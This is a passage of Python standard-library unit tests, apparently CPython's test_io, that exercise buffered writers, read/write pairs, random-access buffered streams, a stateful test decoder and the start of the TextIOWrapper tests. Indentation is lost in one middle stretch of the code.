        buf = self.tp(raw)
        buf.write(b"howdy!")
        self.assertFalse(raw._write_stack)
        buf.detach()
        self.assertEqual(raw._write_stack, [b"howdy!"])
    def test_write(self):
        # Write to the buffered IO but don't overflow the buffer.
        writer = self.MockRawIO()
        bufio = self.tp(writer, 8)
        bufio.write(b"abc")
        self.assertFalse(writer._write_stack)
        buffer = bytearray(b"def")
        bufio.write(buffer)
        buffer[:] = b"***"  # Overwrite our copy of the data
        bufio.flush()
        # The flushed output must contain the original bytes, proving the
        # writer copied the data rather than keeping a reference.
        self.assertEqual(b"".join(writer._write_stack), b"abcdef")
    def test_write_overflow(self):
        # Writing past the 8-byte buffer must trigger implicit flushes.
        writer = self.MockRawIO()
        bufio = self.tp(writer, 8)
        contents = b"abcdefghijklmnop"
        for n in range(0, len(contents), 3):
            bufio.write(contents[n:n+3])
        flushed = b"".join(writer._write_stack)
        # At least (total - 8) bytes were implicitly flushed, perhaps more
        # depending on the implementation.
        self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents, b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
self.assertRaises(TypeError, bufio.writelines, 'abc')
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
self.addCleanup(support.unlink, support.TESTFN)
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
def test_truncate_after_write(self):
# Ensure that truncate preserves the file position after
# writes longer than the buffer size.
# Issue: https://bugs.python.org/issue32228
self.addCleanup(support.unlink, support.TESTFN)
with self.open(support.TESTFN, "wb") as f:
# Fill with some buffer
f.write(b'\x00' * 10000)
buffer_sizes = [8192, 4096, 200]
for buffer_size in buffer_sizes:
with self.open(support.TESTFN, "r+b", buffering=buffer_size) as f:
f.write(b'\x00' * (buffer_size + 1))
# After write write_pos and write_end are set to 0
f.read(1)
# read operation makes sure that pos != raw_pos
f.truncate()
self.assertEqual(f.tell(), buffer_size + 2)
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(support.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
self.assertRaises(OSError, bufio.write, b"abcdef")
# Silence destructor error
bufio.close = lambda: None
def test_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
raw = self.MockRawIO()
def bad_write(b):
raise OSError()
raw.write = bad_write
b = self.tp(raw)
b.write(b'spam')
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
def test_slow_close_from_thread(self):
# Issue #31976
rawio = self.SlowFlushRawIO()
bufio = self.tp(rawio, 8)
t = threading.Thread(target=bufio.close)
t.start()
rawio.in_flush.wait()
self.assertRaises(ValueError, bufio.write, b'spam')
self.assertTrue(bufio.closed)
t.join()
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
    # Run the shared writer tests against the C implementation.
    tp = io.BufferedWriter

    @unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing "
                     "instead of returning NULL for malloc failure.")
    def test_constructor(self):
        BufferedWriterTest.test_constructor(self)
        # The allocation can succeed on 32-bit builds, e.g. with more
        # than 2 GiB RAM and a 64-bit kernel.
        if sys.maxsize > 0x7FFFFFFF:
            rawio = self.MockRawIO()
            bufio = self.tp(rawio)
            self.assertRaises((OverflowError, MemoryError, ValueError),
                              bufio.__init__, rawio, sys.maxsize)

    def test_initialization(self):
        # A failed __init__ must leave the object in a state where
        # subsequent writes raise rather than crash.
        rawio = self.MockRawIO()
        bufio = self.tp(rawio)
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
        self.assertRaises(ValueError, bufio.write, b"def")
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
        self.assertRaises(ValueError, bufio.write, b"def")
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
        self.assertRaises(ValueError, bufio.write, b"def")

    def test_garbage_collection(self):
        # C BufferedWriter objects are collected, and collecting them flushes
        # all data to disk.
        # The Python version has __del__, so it ends into gc.garbage instead
        self.addCleanup(support.unlink, support.TESTFN)
        with support.check_warnings(('', ResourceWarning)):
            rawio = self.FileIO(support.TESTFN, "w+b")
            f = self.tp(rawio)
            f.write(b"123xxx")
            f.x = f  # reference cycle: only the GC can reclaim this
            wr = weakref.ref(f)
            del f
            support.gc_collect()
        self.assertIsNone(wr(), wr)
        with self.open(support.TESTFN, "rb") as f:
            self.assertEqual(f.read(), b"123xxx")

    def test_args_error(self):
        # Issue #17275
        with self.assertRaisesRegex(TypeError, "BufferedWriter"):
            self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedWriterTest(BufferedWriterTest):
    # Run the shared BufferedWriter tests against the pure-Python
    # implementation (_pyio).
    tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
    """Tests for BufferedRWPair, which couples an independent reader and
    an independent writer; subclasses bind ``tp`` to the implementation."""

    def test_constructor(self):
        pair = self.tp(self.MockRawIO(), self.MockRawIO())
        self.assertFalse(pair.closed)

    def test_uninitialized(self):
        # Objects created via __new__ without __init__ must fail cleanly.
        pair = self.tp.__new__(self.tp)
        del pair
        pair = self.tp.__new__(self.tp)
        self.assertRaisesRegex((ValueError, AttributeError),
                               'uninitialized|has no attribute',
                               pair.read, 0)
        self.assertRaisesRegex((ValueError, AttributeError),
                               'uninitialized|has no attribute',
                               pair.write, b'')
        pair.__init__(self.MockRawIO(), self.MockRawIO())
        self.assertEqual(pair.read(0), b'')
        self.assertEqual(pair.write(b''), 0)

    def test_detach(self):
        # A pair wraps two streams, so detach() is unsupported.
        pair = self.tp(self.MockRawIO(), self.MockRawIO())
        self.assertRaises(self.UnsupportedOperation, pair.detach)

    def test_constructor_max_buffer_size_removal(self):
        # The legacy max_buffer_size fourth argument was removed.
        with self.assertRaises(TypeError):
            self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)

    def test_constructor_with_not_readable(self):
        class NotReadable(MockRawIO):
            def readable(self):
                return False
        self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO())

    def test_constructor_with_not_writeable(self):
        class NotWriteable(MockRawIO):
            def writable(self):
                return False
        self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable())

    def test_read(self):
        pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
        self.assertEqual(pair.read(3), b"abc")
        self.assertEqual(pair.read(1), b"d")
        self.assertEqual(pair.read(), b"ef")
        pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
        self.assertEqual(pair.read(None), b"abc")

    def test_readlines(self):
        pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
        self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
        self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
        self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])

    def test_read1(self):
        # .read1() is delegated to the underlying reader object, so this test
        # can be shallow.
        pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
        self.assertEqual(pair.read1(3), b"abc")
        self.assertEqual(pair.read1(), b"def")

    def test_readinto(self):
        for method in ("readinto", "readinto1"):
            with self.subTest(method):
                pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
                data = byteslike(b'\0' * 5)
                self.assertEqual(getattr(pair, method)(data), 5)
                self.assertEqual(bytes(data), b"abcde")

    def test_write(self):
        w = self.MockRawIO()
        pair = self.tp(self.MockRawIO(), w)
        pair.write(b"abc")
        pair.flush()
        buffer = bytearray(b"def")
        pair.write(buffer)
        buffer[:] = b"***"  # Overwrite our copy of the data
        pair.flush()
        self.assertEqual(w._write_stack, [b"abc", b"def"])

    def test_peek(self):
        pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
        self.assertTrue(pair.peek(3).startswith(b"abc"))
        self.assertEqual(pair.read(3), b"abc")

    def test_readable(self):
        pair = self.tp(self.MockRawIO(), self.MockRawIO())
        self.assertTrue(pair.readable())

    def test_writeable(self):
        pair = self.tp(self.MockRawIO(), self.MockRawIO())
        self.assertTrue(pair.writable())

    def test_seekable(self):
        # BufferedRWPairs are never seekable, even if their readers and writers
        # are.
        pair = self.tp(self.MockRawIO(), self.MockRawIO())
        self.assertFalse(pair.seekable())

    # .flush() is delegated to the underlying writer object and has been
    # tested in the test_write method.

    def test_close_and_closed(self):
        pair = self.tp(self.MockRawIO(), self.MockRawIO())
        self.assertFalse(pair.closed)
        pair.close()
        self.assertTrue(pair.closed)

    def test_reader_close_error_on_close(self):
        # An error while closing the reader must not prevent the writer
        # from being closed.
        def reader_close():
            reader_non_existing
        reader = self.MockRawIO()
        reader.close = reader_close
        writer = self.MockRawIO()
        pair = self.tp(reader, writer)
        with self.assertRaises(NameError) as err:
            pair.close()
        self.assertIn('reader_non_existing', str(err.exception))
        self.assertTrue(pair.closed)
        self.assertFalse(reader.closed)
        self.assertTrue(writer.closed)
        # Silence destructor error
        reader.close = lambda: None

    def test_writer_close_error_on_close(self):
        # An error while closing the writer leaves the pair open (the
        # reader still gets closed).
        def writer_close():
            writer_non_existing
        reader = self.MockRawIO()
        writer = self.MockRawIO()
        writer.close = writer_close
        pair = self.tp(reader, writer)
        with self.assertRaises(NameError) as err:
            pair.close()
        self.assertIn('writer_non_existing', str(err.exception))
        self.assertFalse(pair.closed)
        self.assertTrue(reader.closed)
        self.assertFalse(writer.closed)
        # Silence destructor error
        writer.close = lambda: None
        writer = None

        # Ignore BufferedWriter (of the BufferedRWPair) unraisable exception
        with support.catch_unraisable_exception():
            # Ignore BufferedRWPair unraisable exception
            with support.catch_unraisable_exception():
                pair = None
                support.gc_collect()
            support.gc_collect()

    def test_reader_writer_close_error_on_close(self):
        # When both close() calls fail, the reader's error is raised and
        # the writer's error is chained as its __context__.
        def reader_close():
            reader_non_existing
        def writer_close():
            writer_non_existing
        reader = self.MockRawIO()
        reader.close = reader_close
        writer = self.MockRawIO()
        writer.close = writer_close
        pair = self.tp(reader, writer)
        with self.assertRaises(NameError) as err:
            pair.close()
        self.assertIn('reader_non_existing', str(err.exception))
        self.assertIsInstance(err.exception.__context__, NameError)
        self.assertIn('writer_non_existing', str(err.exception.__context__))
        self.assertFalse(pair.closed)
        self.assertFalse(reader.closed)
        self.assertFalse(writer.closed)
        # Silence destructor error
        reader.close = lambda: None
        writer.close = lambda: None

    def test_isatty(self):
        # The pair reports a tty if either underlying stream is a tty.
        class SelectableIsAtty(MockRawIO):
            def __init__(self, isatty):
                MockRawIO.__init__(self)
                self._isatty = isatty
            def isatty(self):
                return self._isatty
        pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
        self.assertFalse(pair.isatty())
        pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
        self.assertTrue(pair.isatty())
        pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
        self.assertTrue(pair.isatty())
        pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
        self.assertTrue(pair.isatty())

    def test_weakref_clearing(self):
        brw = self.tp(self.MockRawIO(), self.MockRawIO())
        ref = weakref.ref(brw)
        brw = None
        ref = None  # Shouldn't segfault.
class CBufferedRWPairTest(BufferedRWPairTest):
    # Run the shared BufferedRWPair tests against the C implementation.
    tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
    # Run the shared BufferedRWPair tests against the pure-Python
    # implementation (_pyio).
    tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
    """Tests for buffered random-access streams: inherits both the reader
    and writer suites and adds interleaved read/write scenarios."""
    read_mode = "rb+"
    write_mode = "wb+"

    def test_constructor(self):
        BufferedReaderTest.test_constructor(self)
        BufferedWriterTest.test_constructor(self)

    def test_uninitialized(self):
        BufferedReaderTest.test_uninitialized(self)
        BufferedWriterTest.test_uninitialized(self)

    def test_read_and_write(self):
        raw = self.MockRawIO((b"asdf", b"ghjk"))
        rw = self.tp(raw, 8)
        self.assertEqual(b"as", rw.read(2))
        rw.write(b"ddd")
        rw.write(b"eee")
        self.assertFalse(raw._write_stack)  # Buffer writes
        self.assertEqual(b"ghjk", rw.read())
        self.assertEqual(b"dddeee", raw._write_stack[0])

    def test_seek_and_tell(self):
        raw = self.BytesIO(b"asdfghjkl")
        rw = self.tp(raw)
        self.assertEqual(b"as", rw.read(2))
        self.assertEqual(2, rw.tell())
        rw.seek(0, 0)
        self.assertEqual(b"asdf", rw.read(4))
        rw.write(b"123f")
        rw.seek(0, 0)
        self.assertEqual(b"asdf123fl", rw.read())
        self.assertEqual(9, rw.tell())
        rw.seek(-4, 2)
        self.assertEqual(5, rw.tell())
        rw.seek(2, 1)
        self.assertEqual(7, rw.tell())
        self.assertEqual(b"fl", rw.read(11))
        rw.flush()
        self.assertEqual(b"asdf123fl", raw.getvalue())
        # Float positions must be rejected.
        self.assertRaises(TypeError, rw.seek, 0.0)

    def check_flush_and_read(self, read_func):
        # Shared driver: verify reads stay consistent across interleaved
        # writes and flushes; read_func abstracts read/readinto/peek.
        raw = self.BytesIO(b"abcdefghi")
        bufio = self.tp(raw)
        self.assertEqual(b"ab", read_func(bufio, 2))
        bufio.write(b"12")
        self.assertEqual(b"ef", read_func(bufio, 2))
        self.assertEqual(6, bufio.tell())
        bufio.flush()
        self.assertEqual(6, bufio.tell())
        self.assertEqual(b"ghi", read_func(bufio))
        raw.seek(0, 0)
        raw.write(b"XYZ")
        # flush() resets the read buffer
        bufio.flush()
        bufio.seek(0, 0)
        self.assertEqual(b"XYZ", read_func(bufio, 3))

    def test_flush_and_read(self):
        self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))

    def test_flush_and_readinto(self):
        def _readinto(bufio, n=-1):
            b = bytearray(n if n >= 0 else 9999)
            n = bufio.readinto(b)
            return bytes(b[:n])
        self.check_flush_and_read(_readinto)

    def test_flush_and_peek(self):
        def _peek(bufio, n=-1):
            # This relies on the fact that the buffer can contain the whole
            # raw stream, otherwise peek() can return less.
            b = bufio.peek(n)
            if n != -1:
                b = b[:n]
            bufio.seek(len(b), 1)
            return b
        self.check_flush_and_read(_peek)

    def test_flush_and_write(self):
        raw = self.BytesIO(b"abcdefghi")
        bufio = self.tp(raw)
        bufio.write(b"123")
        bufio.flush()
        bufio.write(b"45")
        bufio.flush()
        bufio.seek(0, 0)
        self.assertEqual(b"12345fghi", raw.getvalue())
        self.assertEqual(b"12345fghi", bufio.read())

    def test_threads(self):
        BufferedReaderTest.test_threads(self)
        BufferedWriterTest.test_threads(self)

    def test_writes_and_peek(self):
        def _peek(bufio):
            bufio.peek(1)
        self.check_writes(_peek)
        def _peek(bufio):
            pos = bufio.tell()
            bufio.seek(-1, 1)
            bufio.peek(1)
            bufio.seek(pos, 0)
        self.check_writes(_peek)

    def test_writes_and_reads(self):
        def _read(bufio):
            bufio.seek(-1, 1)
            bufio.read(1)
        self.check_writes(_read)

    def test_writes_and_read1s(self):
        def _read1(bufio):
            bufio.seek(-1, 1)
            bufio.read1(1)
        self.check_writes(_read1)

    def test_writes_and_readintos(self):
        def _read(bufio):
            bufio.seek(-1, 1)
            bufio.readinto(bytearray(1))
        self.check_writes(_read)

    def test_write_after_readahead(self):
        # Issue #6629: writing after the buffer was filled by readahead should
        # first rewind the raw stream.
        for overwrite_size in [1, 5]:
            raw = self.BytesIO(b"A" * 10)
            bufio = self.tp(raw, 4)
            # Trigger readahead
            self.assertEqual(bufio.read(1), b"A")
            self.assertEqual(bufio.tell(), 1)
            # Overwriting should rewind the raw stream if it needs so
            bufio.write(b"B" * overwrite_size)
            self.assertEqual(bufio.tell(), overwrite_size + 1)
            # If the write size was smaller than the buffer size, flush() and
            # check that rewind happens.
            bufio.flush()
            self.assertEqual(bufio.tell(), overwrite_size + 1)
            s = raw.getvalue()
            self.assertEqual(s,
                             b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))

    def test_write_rewind_write(self):
        # Various combinations of reading / writing / seeking backwards / writing again
        def mutate(bufio, pos1, pos2):
            assert pos2 >= pos1
            # Fill the buffer
            bufio.seek(pos1)
            bufio.read(pos2 - pos1)
            bufio.write(b'\x02')
            # This writes earlier than the previous write, but still inside
            # the buffer.
            bufio.seek(pos1)
            bufio.write(b'\x01')
        b = b"\x80\x81\x82\x83\x84"
        for i in range(0, len(b)):
            for j in range(i, len(b)):
                raw = self.BytesIO(b)
                bufio = self.tp(raw, 100)
                mutate(bufio, i, j)
                bufio.flush()
                expected = bytearray(b)
                expected[j] = 2
                expected[i] = 1
                self.assertEqual(raw.getvalue(), expected,
                                 "failed result for i=%d, j=%d" % (i, j))

    def test_truncate_after_read_or_write(self):
        raw = self.BytesIO(b"A" * 10)
        bufio = self.tp(raw, 100)
        self.assertEqual(bufio.read(2), b"AA")  # the read buffer gets filled
        self.assertEqual(bufio.truncate(), 2)
        self.assertEqual(bufio.write(b"BB"), 2)  # the write buffer increases
        self.assertEqual(bufio.truncate(), 4)

    def test_misbehaved_io(self):
        BufferedReaderTest.test_misbehaved_io(self)
        BufferedWriterTest.test_misbehaved_io(self)

    def test_interleaved_read_write(self):
        # Test for issue #12213
        with self.BytesIO(b'abcdefgh') as raw:
            with self.tp(raw, 100) as f:
                f.write(b"1")
                self.assertEqual(f.read(1), b'b')
                f.write(b'2')
                self.assertEqual(f.read1(1), b'd')
                f.write(b'3')
                buf = bytearray(1)
                f.readinto(buf)
                self.assertEqual(buf, b'f')
                f.write(b'4')
                self.assertEqual(f.peek(1), b'h')
                f.flush()
                self.assertEqual(raw.getvalue(), b'1b2d3f4h')
        with self.BytesIO(b'abc') as raw:
            with self.tp(raw, 100) as f:
                self.assertEqual(f.read(1), b'a')
                f.write(b"2")
                self.assertEqual(f.read(1), b'c')
                f.flush()
                self.assertEqual(raw.getvalue(), b'a2c')

    def test_interleaved_readline_write(self):
        with self.BytesIO(b'ab\ncdef\ng\n') as raw:
            with self.tp(raw) as f:
                f.write(b'1')
                self.assertEqual(f.readline(), b'b\n')
                f.write(b'2')
                self.assertEqual(f.readline(), b'def\n')
                f.write(b'3')
                self.assertEqual(f.readline(), b'\n')
                f.flush()
                self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')

    # You can't construct a BufferedRandom over a non-seekable stream.
    test_unseekable = None
class CBufferedRandomTest(BufferedRandomTest, SizeofTest):
    # Run the shared random-access tests against the C implementation.
    tp = io.BufferedRandom

    @unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing "
                     "instead of returning NULL for malloc failure.")
    def test_constructor(self):
        BufferedRandomTest.test_constructor(self)
        # The allocation can succeed on 32-bit builds, e.g. with more
        # than 2 GiB RAM and a 64-bit kernel.
        if sys.maxsize > 0x7FFFFFFF:
            rawio = self.MockRawIO()
            bufio = self.tp(rawio)
            self.assertRaises((OverflowError, MemoryError, ValueError),
                              bufio.__init__, rawio, sys.maxsize)

    def test_garbage_collection(self):
        CBufferedReaderTest.test_garbage_collection(self)
        CBufferedWriterTest.test_garbage_collection(self)

    def test_args_error(self):
        # Issue #17275
        with self.assertRaisesRegex(TypeError, "BufferedRandom"):
            self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedRandomTest(BufferedRandomTest):
    # Run the shared BufferedRandom tests against the pure-Python
    # implementation (_pyio).
    tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
    """
    For testing seek/tell behavior with a stateful, buffering decoder.
    Input is a sequence of words. Words may be fixed-length (length set
    by input) or variable-length (period-terminated). In variable-length
    mode, extra periods are ignored. Possible words are:
    - 'i' followed by a number sets the input length, I (maximum 99).
      When I is set to 0, words are space-terminated.
    - 'o' followed by a number sets the output length, O (maximum 99).
    - Any other word is converted into a word followed by a period on
      the output. The output word consists of the input word truncated
      or padded out with hyphens to make its length equal to O. If O
      is 0, the word is output verbatim without truncating or padding.
    I and O are initially set to 1. When I changes, any buffered input is
    re-scanned according to the new I. EOF also terminates the last word.
    """

    def __init__(self, errors='strict'):
        codecs.IncrementalDecoder.__init__(self, errors)
        self.reset()

    def __repr__(self):
        return '<SID %x>' % id(self)

    def reset(self):
        # Start in fixed-length mode with one-byte words, one-char output.
        self.i = 1
        self.o = 1
        self.buffer = bytearray()

    def getstate(self):
        # XOR each length with 1 so that a freshly reset decoder
        # (i == o == 1) reports flags == 0.
        flags = (self.i ^ 1) * 100 + (self.o ^ 1)
        return bytes(self.buffer), flags

    def setstate(self, state):
        buffer, flags = state
        self.buffer = bytearray(buffer)
        i, o = divmod(flags, 100)
        self.i = i ^ 1
        self.o = o ^ 1

    def decode(self, input, final=False):
        """Feed bytes in; return whatever complete words they decode to."""
        output = ''
        for byte in input:
            if self.i:
                # Fixed-length mode: a word completes after self.i bytes.
                self.buffer.append(byte)
                if len(self.buffer) == self.i:
                    output += self.process_word()
            elif byte != ord('.'):
                # Variable-length mode: accumulate until a period.
                self.buffer.append(byte)
            elif self.buffer:
                # Terminating period (extra periods are ignored).
                output += self.process_word()
        if final and self.buffer:
            # EOF terminates the last word.
            output += self.process_word()
        return output

    def process_word(self):
        """Consume the buffered word and return its decoded output."""
        output = ''
        first = self.buffer[0]
        if first == ord('i'):
            self.i = min(99, int(self.buffer[1:] or 0))   # set input length
        elif first == ord('o'):
            self.o = min(99, int(self.buffer[1:] or 0))   # set output length
        else:
            output = self.buffer.decode('ascii')
            if len(output) < self.o:
                output += '-' * self.o   # pad out with hyphens
            if self.o:
                output = output[:self.o]   # truncate to output length
            output += '.'
        self.buffer = bytearray()
        return output

    codecEnabled = False

    @classmethod
    def lookupTestDecoder(cls, name):
        # Only resolve 'test_decoder' while a test has enabled the codec.
        if not (cls.codecEnabled and name == 'test_decoder'):
            return None
        latin1 = codecs.lookup('latin-1')
        return codecs.CodecInfo(
            name='test_decoder', encode=latin1.encode, decode=None,
            incrementalencoder=None,
            streamreader=None, streamwriter=None,
            incrementaldecoder=cls)
# Register the previous decoder for testing.
# Disabled by default, tests will enable it.
# (lookupTestDecoder returns None unless codecEnabled is flipped on.)
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
    """
    Make sure the StatefulIncrementalDecoder actually works.
    """

    # Each entry is (input bytes, final flag, expected decoded string).
    test_cases = [
        # I=1, O=1 (fixed-length input == fixed-length output)
        (b'abcd', False, 'a.b.c.d.'),
        # I=0, O=0 (variable-length input, variable-length output)
        (b'oiabcd', True, 'abcd.'),
        # I=0, O=0 (should ignore extra periods)
        (b'oi...abcd...', True, 'abcd.'),
        # I=0, O=6 (variable-length input, fixed-length output)
        (b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
        # I=2, O=6 (fixed-length input < fixed-length output)
        (b'i.i2.o6xyz', True, 'xy----.z-----.'),
        # I=6, O=3 (fixed-length input > fixed-length output)
        (b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
        # I=0, then 3; O=29, then 15 (with longer output)
        (b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
         'a----------------------------.' +
         'b----------------------------.' +
         'cde--------------------------.' +
         'abcdefghijabcde.' +
         'a.b------------.' +
         '.c.------------.' +
         'd.e------------.' +
         'k--------------.' +
         'l--------------.' +
         'm--------------.')
    ]

    def test_decoder(self):
        # Try a few one-shot test cases.
        for input, eof, output in self.test_cases:
            d = StatefulIncrementalDecoder()
            self.assertEqual(d.decode(input, eof), output)

        # Also test an unfinished decode, followed by forcing EOF.
        d = StatefulIncrementalDecoder()
        self.assertEqual(d.decode(b'oiabcd'), '')
        self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
    # Tests for the text layer; subclasses bind self.TextIOWrapper,
    # self.BytesIO, etc. to the C or Python implementations.

    def setUp(self):
        # Raw data mixing \r\n, \r and \n endings, plus its
        # universal-newlines-normalized text form.
        self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
        self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
        support.unlink(support.TESTFN)

    def tearDown(self):
        support.unlink(support.TESTFN)
    def test_constructor(self):
        # TextIOWrapper can be re-initialized in place; encoding, newline
        # and line_buffering take effect on each __init__ call, and bad
        # newline arguments are rejected.
        r = self.BytesIO(b"\xc3\xa9\n\n")
        b = self.BufferedReader(r, 1000)
        t = self.TextIOWrapper(b)
        t.__init__(b, encoding="latin-1", newline="\r\n")
        self.assertEqual(t.encoding, "latin-1")
        self.assertEqual(t.line_buffering, False)
        t.__init__(b, encoding="utf-8", line_buffering=True)
        self.assertEqual(t.encoding, "utf-8")
        self.assertEqual(t.line_buffering, True)
        self.assertEqual("\xe9\n", t.readline())
        self.assertRaises(TypeError, t.__init__, b, newline=42)
        self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
    def test_uninitialized(self):
        # An object from __new__ without __init__ must fail cleanly and
        # become usable after a later __init__.
